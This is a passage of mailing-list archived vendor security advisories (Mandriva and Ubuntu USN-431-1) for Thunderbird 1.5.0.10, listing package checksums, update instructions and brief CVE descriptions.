2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.10-1mdv2007.0.x86_64.rpm 17f29f137a8c175b5a3d67fcaf0f139e 2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.10-1mdv2007.0.x86_64.rpm f1cc6c12062c1724b213d949b5c776a4 2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.10-1mdv2007.0.x86_64.rpm 63e6725a03b207964e0250179ed01fc2 2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.10-1mdv2007.0.x86_64.rpm 8850366b1877c9a35287750f48a6e16f 
2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.10-1mdv2007.0.x86_64.rpm 36533988ec1dc826264d56a4e5846ca7 2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.10-1mdv2007.0.x86_64.rpm 9505e790a8a20e31576615f8daf9ed1a 2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.10-1mdv2007.0.x86_64.rpm d1aaaf5351d85c82eab4e2c784a76c12 2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.10-1mdv2007.0.x86_64.rpm 8b199d144af36be054127cf563a29003 2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.10-1mdv2007.0.x86_64.rpm e9203cd4b22c3fffcc51bad017a6df7c 2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.10-1mdv2007.0.x86_64.rpm 0dd8ecba456941ca641f642ae3224055 2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.10-1mdv2007.0.x86_64.rpm 8956d2fa944c78ddd4b73e51c7974087 2007.0/x86_64/nsinstall-1.5.0.10-1mdv2007.0.x86_64.rpm 46b8dbe1a61ecd178d10d37d7dd82142 2007.0/SRPMS/mozilla-thunderbird-1.5.0.10-1mdv2007.0.src.rpm c6832073064476f9ac955fa74e1e28a8 2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.10-1mdv2007.0.src.rpm 0cd31f1a25e221fdbee15fcd57cd7484 2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.10-1mdv2007.0.src.rpm Corporate 3.0: 9273740d506e00cb080d4655d3534f8b corporate/3.0/i586/mozilla-thunderbird-1.5.0.10-0.1.C30mdk.i586.rpm d1ccc3d4dbf8cd41a0d9ca32a6a780f9 corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.10-0.2.C30mdk.i586.rpm f419369b8af3bd2357faaa8ed4283ad9 corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.10-0.2.C30mdk.i586.rpm 2ccea0e6d34589ee1dd6d86e2dbed0c7 corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.10-0.2.C30mdk.i586.rpm 62dce3896edb8695b41083a44331dbb9 corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.10-0.2.C30mdk.i586.rpm ed71d342ec42b46f0c46e9cbd44500f5 corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.10-0.2.C30mdk.i586.rpm b7ef583c8c77295cf79f21c1d1341779 corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.10-0.1.C30mdk.i586.rpm 4e5b4fbfd8fcc19ac21284748bc9d732 corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.10-0.2.C30mdk.i586.rpm a15f868fe97c690bc5f9cf118d70921b 
corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.10-0.1.C30mdk.i586.rpm d16004f03a33a5317ecf56749b3baed9 corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.10-0.2.C30mdk.i586.rpm df16b35a5fd84e328d83dce3921d8cf7 corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.10-0.2.C30mdk.i586.rpm 534579e8aabc3bcf8c5649f0635b4d54 corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.10-0.2.C30mdk.i586.rpm 8577874314f02e15b970b27baf491da3 corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.10-0.2.C30mdk.i586.rpm 9dfbc99c662ec55dea018e640e4d28e9 corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.10-0.2.C30mdk.i586.rpm 0473111f44afb83767c3fe41638a66ae corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.10-0.2.C30mdk.i586.rpm 31ec12b136776ee7247891c270c21d1c corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.10-0.2.C30mdk.i586.rpm d4b214542ae9c763039b3941bafa6f17 corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.10-0.2.C30mdk.i586.rpm 5b369dce035dbd5f1bd1fd9c58ae96eb corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.10-0.2.C30mdk.i586.rpm c8825163de4113720d2d2b9f1ec54e58 corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.10-0.2.C30mdk.i586.rpm da2ec244863ee926dd8270c02fffca27 corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.10-0.2.C30mdk.i586.rpm 40c5b505003f6ac5d330befded47dc6e corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.10-0.2.C30mdk.i586.rpm 19dad617e119e3fe942441a279d4b3fd corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.10-0.2.C30mdk.i586.rpm 8c2c932e0007b5d729aae574123890ae corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.10-0.2.C30mdk.i586.rpm ec8053e43b1c7d702866249928558e0f corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.10-0.2.C30mdk.i586.rpm 7d45004f8e4bb9a3b25f5f4fac9838a5 corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.10-0.2.C30mdk.i586.rpm bcb1d23ab9aad20cbfbc78989f2f0cd2 
corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.10-0.2.C30mdk.i586.rpm 4fc582f98face6236caf535b9bbacad2 corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.10-0.2.C30mdk.i586.rpm 622ab027440a923b3f9967fee9c111b2 corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.10-0.2.C30mdk.i586.rpm a7eab843b4ded1e32bdfa1883048a8a1 corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.10-0.2.C30mdk.i586.rpm be62409e36445de38fd923d8d1e46c39 corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.10-0.2.C30mdk.i586.rpm b27674042c9841198dbf609c3267a305 corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.10-0.2.C30mdk.i586.rpm ba6f270f81590fcde3449059ac81eea4 corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.10-0.2.C30mdk.i586.rpm 243d8bd877182cd2b5c9798c3292c8ea corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.10-0.2.C30mdk.i586.rpm 46e47815daa20c787fcbee19d5fa4ad4 corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.10-0.2.C30mdk.i586.rpm 287f8330f6deeaae3c2cde9b1e424a33 corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.10-0.2.C30mdk.i586.rpm 81c5be7b47258fc73fe8c48059ba8e03 corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.10-0.2.C30mdk.i586.rpm 6f6e120e62da08046de143b70b0187ed corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.10-0.2.C30mdk.i586.rpm cfb5bc55c6a972cbbb1bf9c6394eb86e corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.10-0.2.C30mdk.i586.rpm 40a63ce766b306e6c6423ba8e054f887 corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.10-0.2.C30mdk.i586.rpm 00f1bff4f2267308a8507ff6e4f1e01b corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.10-0.2.C30mdk.i586.rpm 7980f6f2e95ecc319ba6e430148ff92f corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.10-0.2.C30mdk.i586.rpm 7e52bedf5090c6796e609c40e423f81a corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.10-0.2.C30mdk.i586.rpm c41b9ca858a5fbe18c1ae56a5cff9f14 corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.10-0.2.C30mdk.i586.rpm a50d2413edc446a4349d87122078c4a8 corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.10-0.2.C30mdk.i586.rpm 
af7a53c091209317b7b1abbe2abe6636 corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.10-0.2.C30mdk.i586.rpm 74e3a755c9e4ab6c294a6e2ae85ed0d5 corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.10-0.2.C30mdk.i586.rpm f4fae58ef25d999f9632f759738af6d6 corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.10-0.2.C30mdk.i586.rpm 6777dddf183449a404fc540d5dad43ab corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.10-0.2.C30mdk.i586.rpm f9033076e7a749442e298ed4762f968d corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.10-0.2.C30mdk.i586.rpm 995841dbfb17603b4c234f7d69b1399b corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.10-0.2.C30mdk.i586.rpm 8c56e2c3371e739cce5c89347e957634 corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.10-0.2.C30mdk.i586.rpm c70256acde122a3b7e90d3880794184d corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.10-0.2.C30mdk.i586.rpm 69b2d18c13d08b72dbd19030613c6c67 corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.10-0.2.C30mdk.i586.rpm 88fc12e9755a9aeeb00c73aa577e6e1d corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.10-0.2.C30mdk.i586.rpm bee92023af6580cc56a180d6a682b6da corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.10-0.2.C30mdk.i586.rpm 68dd134b7e34fad18bde90acebeed2b4 corporate/3.0/i586/nsinstall-1.5.0.10-0.1.C30mdk.i586.rpm 10a933ad4dcbab9cd9b3b916b96f75ed corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.10-0.1.C30mdk.src.rpm 5ffe58e04f606087bc3ad2ec3432df3f corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.10-0.2.C30mdk.src.rpm 15da7339a6a20307e6fc7d97da5f88a3 corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.10-0.2.C30mdk.src.rpm Corporate 3.0/X86_64: 5eed6a8b65cfa110c4d461b081ab5e1d corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.10-0.1.C30mdk.x86_64.rpm 9ae7a4f6fd7e0bd03ece0bebc324d18e corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.10-0.2.C30mdk.x86_64.rpm 7501f1efc072aeabbd562490375b520d corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.10-0.2.C30mdk.x86_64.rpm 5966823049a0fd1a3adfd22c95fedeaa 
corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.10-0.2.C30mdk.x86_64.rpm 8e8cf13ddbf56959df0773b6504d610c corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.10-0.2.C30mdk.x86_64.rpm 0e1710efb25ccef6937c266afc7e8ff0 corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.10-0.2.C30mdk.x86_64.rpm 156f565fa8b48f113f272965fd033017 corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.10-0.1.C30mdk.x86_64.rpm d84f81185525ef67567ffcd5f736bbc4 corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.10-0.2.C30mdk.x86_64.rpm 465bd954fbd21b09cd4adc5abbac478d corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.10-0.1.C30mdk.x86_64.rpm b78668237055e06c2a70061e89fe2361 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.10-0.2.C30mdk.x86_64.rpm df32ffe1810ba059cd2469c94e0385be corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.10-0.2.C30mdk.x86_64.rpm 1800a78540308a2dadf8e213407543eb corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.10-0.2.C30mdk.x86_64.rpm 0f67358b87f54539cf100638fa2b335e corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.10-0.2.C30mdk.x86_64.rpm f50d554baf7fe27c0d5f8126b4de8c9f corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.10-0.2.C30mdk.x86_64.rpm 63c3652e6f4f7fa396e3efe20bf4a037 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.10-0.2.C30mdk.x86_64.rpm 4bc507370093f469c58b2dd4e97e1775 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.10-0.2.C30mdk.x86_64.rpm 247261877471e9b863f9741bc74bebe0 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.10-0.2.C30mdk.x86_64.rpm 732cb2553bf8f3385c2eb570c77e0242 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.10-0.2.C30mdk.x86_64.rpm 46eeee865e6d820c8c91d41eca5808da corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.10-0.2.C30mdk.x86_64.rpm 59e5fa6d80e8b69f1eec08257da2d17e corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.10-0.2.C30mdk.x86_64.rpm a51eb9656d6b247a4b245dd61ae73771 
corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.10-0.2.C30mdk.x86_64.rpm 81db232cb316d44e42259521113be1fa corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.10-0.2.C30mdk.x86_64.rpm e6e6b8467e504656f4b920e9e0e20387 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.10-0.2.C30mdk.x86_64.rpm 0e7abd2324378c57a1cd53d365b147ff corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.10-0.2.C30mdk.x86_64.rpm 8a0329b5ff9b807237db590fb6c6a40d corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.10-0.2.C30mdk.x86_64.rpm aea2573674a2d191f795b39e4eee5c08 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.10-0.2.C30mdk.x86_64.rpm 4c9d0fd467b65a41e2072cbe4662af42 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.10-0.2.C30mdk.x86_64.rpm 6cc5418aeb8413451d8d5d5168b1d72d corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.10-0.2.C30mdk.x86_64.rpm 7a33a0bf0aa1bd226ecc514ceb76a9e5 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.10-0.2.C30mdk.x86_64.rpm 052c6c823f5520dfa53bb12ec692d077 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.10-0.2.C30mdk.x86_64.rpm d86e76149521a388c84463ac1066138a corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.10-0.2.C30mdk.x86_64.rpm 9fba0169db5d29f34ba9f57235ad9123 corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.10-0.2.C30mdk.x86_64.rpm 32842ba8d80d6c8d404f6df8a979ef28 corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.10-0.2.C30mdk.x86_64.rpm c29de851558ca0ca4d968b90b3ae9bdd corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.10-0.2.C30mdk.x86_64.rpm 3013b75ff81335ba8ee4e2b4924c82d0 corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.10-0.2.C30mdk.x86_64.rpm 12aeb30efd8bc517eb7d94a6a4d57b33 corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.10-0.2.C30mdk.x86_64.rpm c151fbd8060d857b640559fd36003550 corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.10-0.2.C30mdk.x86_64.rpm 49a4aacc21f79c4e2b39b0371467261a 
corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.10-0.2.C30mdk.x86_64.rpm d79b8c98d3f811fd1955454c1f8d0516 corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.10-0.2.C30mdk.x86_64.rpm af6e5c2e9b2e8dccbf85d87e21069413 corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.10-0.2.C30mdk.x86_64.rpm ff8008a1e083da73d4b6ea803e973fc4 corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.10-0.2.C30mdk.x86_64.rpm 43a153102a15d16fd4e26e56afca6b65 corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.10-0.2.C30mdk.x86_64.rpm 93f6aa27792c0d384318b6d6c84f5257 corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.10-0.2.C30mdk.x86_64.rpm 91db2a3a3cc6446466a1b1b4414a248d corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.10-0.2.C30mdk.x86_64.rpm a41bdb309299da5fdfac1e76a1833854 corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.10-0.2.C30mdk.x86_64.rpm 6c53fafaaa14b2defd0da3cab8074c25 corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.10-0.2.C30mdk.x86_64.rpm af27daa8b7f3c4facec85afde1353035 corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.10-0.2.C30mdk.x86_64.rpm bd6bd071b7991ebe90fb4b12b16cc61f corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.10-0.2.C30mdk.x86_64.rpm 50fac75c2e3ae2cd790211ea31722674 corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.10-0.2.C30mdk.x86_64.rpm f712eaa7ff8096b6bd862dd644703264 corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.10-0.2.C30mdk.x86_64.rpm 28572a795636993bcffec7914e329990 corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.10-0.2.C30mdk.x86_64.rpm b2eafda9c8cbfadf49eb9ad5225fca2b corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.10-0.2.C30mdk.x86_64.rpm 5dbd5e6737c51080ba2ea0bbf78aeb04 corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.10-0.2.C30mdk.x86_64.rpm 1ac54705a59fa3c3bc2cb1de04c60072 corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.10-0.2.C30mdk.x86_64.rpm e17f8d89057b82da95e337acd2c50343 corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.10-0.2.C30mdk.x86_64.rpm 1a907acf823e7a13dbc254cef0c73d92 
corporate/3.0/x86_64/nsinstall-1.5.0.10-0.1.C30mdk.x86_64.rpm
 10a933ad4dcbab9cd9b3b916b96f75ed  corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.10-0.1.C30mdk.src.rpm
 5ffe58e04f606087bc3ad2ec3432df3f  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.10-0.2.C30mdk.src.rpm
 15da7339a6a20307e6fc7d97da5f88a3  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.10-0.2.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF7fDLmqjQ0CJFipgRAnRNAJ9YQdzHG+LBg+IPlmk0I7ChsRTSAgCgjoeQ
KgRWeu9OJp6bRpJ2GYvJfS0=
=E3ov
-----END PGP SIGNATURE-----

From kees at ubuntu.com Wed Mar 7 01:54:41 2007
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 6 Mar 2007 17:54:41 -0800
Subject: [Full-disclosure] [USN-431-1] Thunderbird vulnerabilities
Message-ID: <20070307015441.GP9621@outflux.net>

===========================================================
Ubuntu Security Notice USN-431-1             March 07, 2007
mozilla-thunderbird vulnerabilities
CVE-2007-0008, CVE-2007-0009, CVE-2007-0775, CVE-2007-0776,
CVE-2007-0777
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu,
Edubuntu, and
Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  mozilla-thunderbird             1.5.0.10-0ubuntu0.5.10

Ubuntu 6.06 LTS:
  mozilla-thunderbird             1.5.0.10-0ubuntu0.6.06

Ubuntu 6.10:
  mozilla-thunderbird             1.5.0.10-0ubuntu0.6.10

After a standard system upgrade you need to restart Thunderbird to
effect the necessary changes.

Details follow:

The SSLv2 protocol support in the NSS library did not sufficiently check
the validity of public keys presented with an SSL certificate. A
malicious SSL web site using SSLv2 could potentially exploit this to
execute arbitrary code with the user's privileges. (CVE-2007-0008)

The SSLv2 protocol support in the NSS library did not sufficiently verify
the validity of client master keys presented in an SSL client
certificate. A remote attacker could exploit this to execute arbitrary
code in a server application that uses the NSS library. (CVE-2007-0009)

Various flaws have been reported that could allow an attacker to execute
arbitrary code with user privileges by tricking the user into opening a
malicious web page.
(CVE-2007-0775, CVE-2007-0776, CVE-2007-0777)

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10.diff.gz
      Size/MD5: 451558 9201ce342ac44e7457f9effe0b2260f1
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10.dsc
      Size/MD5: 963 096c2f8f7595b063cdb57734aee49fc7
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10.orig.tar.gz
      Size/MD5: 36077004 6c3d75d0fb4d1382bb64fb0808eab840

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.5.10_amd64.deb
      Size/MD5: 3530774 87d19a325390947583e48a0acc1c430e
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.5.10_amd64.deb
      Size/MD5: 190690 8b94c996f15698e3e4e5f10abeba99f9
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.5.10_amd64.deb
      Size/MD5: 55902 8df7e608027f16e4dbc52c6df70a935c
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10_amd64.deb
      Size/MD5: 12060510 bffb0df58665aa9e0bda36e8d2ab0dcf

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.5.10_i386.deb
      Size/MD5: 3521898 735c894ec6a51acde89e9419537a1af0
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.5.10_i386.deb
      Size/MD5: 184074 edcad564676152a81a4b03009782fa0f
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.5.10_i386.deb
      Size/MD5: 51530 fbacc5e9bdb9fb69e054296da579db55
http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10_i386.deb Size/MD5: 10348302 448cf552030f1e113ef6eecd3db47ec0 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.5.10_powerpc.deb Size/MD5: 3527478 a62c8ea3d17e342c697fba213701fac9 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.5.10_powerpc.deb Size/MD5: 187408 6b53d9f03e9776f35f55a44b11324219 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.5.10_powerpc.deb Size/MD5: 55096 6715a4ba6cce73da08932aa035f9f1f6 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10_powerpc.deb Size/MD5: 11592470 4fde80cd428cf5f962a5fa21a1100c04 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.5.10_sparc.deb Size/MD5: 3523640 f1950b4c50d02a43f6ab02618c49ce5e http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.5.10_sparc.deb Size/MD5: 184856 ff96fb8e4ac2fbe594199ad554fa14ad http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.5.10_sparc.deb Size/MD5: 52986 12026f7161124993d7ce057fb653eebb http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10_sparc.deb Size/MD5: 10831064 1d98f8ff2cca32fc5efdccf6f45d041b Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06.diff.gz Size/MD5: 454934 3634b0418aa5cbee5e0c194dece32b45 
http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06.dsc Size/MD5: 963 ce0d4a0e906b98b47379417e02acf9d9 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.06_amd64.deb Size/MD5: 3534786 4048c5389518c3be184a6419b0a92dd3 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.06_amd64.deb Size/MD5: 194174 8780af0825be29bfbb9e4c696d973ce0 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.06_amd64.deb Size/MD5: 59408 7cb37722b78dfa50bb6e46ab92b53ccc http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06_amd64.deb Size/MD5: 12070202 f45fd5e505a0536659947aca0de26f8b i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.06_i386.deb Size/MD5: 3527078 fc76f9a36e74f02185a97cd5740c7de7 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.06_i386.deb Size/MD5: 187538 50b6efcce4b41288152226f3dd611db7 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.06_i386.deb Size/MD5: 54922 d2e14f478a41db1b1aa53bbac4abba4e http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06_i386.deb Size/MD5: 10347054 8422c679127103ee6ea36ce4e9f2ceb5 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.06_powerpc.deb Size/MD5: 3532870 8665536250fad703a6e4e6ff181b486e 
